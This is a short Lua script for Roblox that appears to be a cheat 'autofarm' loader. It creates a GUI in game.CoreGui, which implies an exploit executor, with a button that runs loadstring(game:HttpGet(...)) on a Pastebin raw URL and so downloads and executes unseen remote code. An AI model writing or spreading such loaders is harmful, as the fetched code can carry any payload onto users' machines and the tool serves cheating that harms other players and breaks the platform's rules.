
local ScreenGui = Instance.new("ScreenGui")
local main = Instance.new("Frame")
local TextLabel = Instance.new("TextLabel")
local script1 = Instance.new("TextButton")

--Properties:

ScreenGui.Parent = game.CoreGui

main.Name = "main"
main.Parent = ScreenGui
main.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
main.Position = UDim2.new(0.330590844, 0, 0.0773955658, 0)
main.Size = UDim2.new(0, 371, 0, 159)
main.Active = true
main.Draggable = true

TextLabel.Parent = main
TextLabel.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.Size = UDim2.new(0, 371, 0, 50)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "Autofarm GUI 2021"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextSize = 40.000
TextLabel.TextStrokeColor3 = Color3.fromRGB(255, 255, 255)

script1.Name = "script1"
script1.Parent = main
script1.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
script1.Position = UDim2.new(0, 0, 0.314465404, 0)
script1.Size = UDim2.new(0, 371, 0, 109)
script1.Font = Enum.Font.SourceSansBold
script1.Text = "Click For Autofarm Maded By Mikka"
script1.TextColor3 = Color3.fromRGB(0, 0, 0)
script1.TextSize = 25.000
script1.MouseButton1Down:connect(function()
	loadstring(game:HttpGet("https://pastebin.com/raw/hDDc3XQb​",true))()
end)
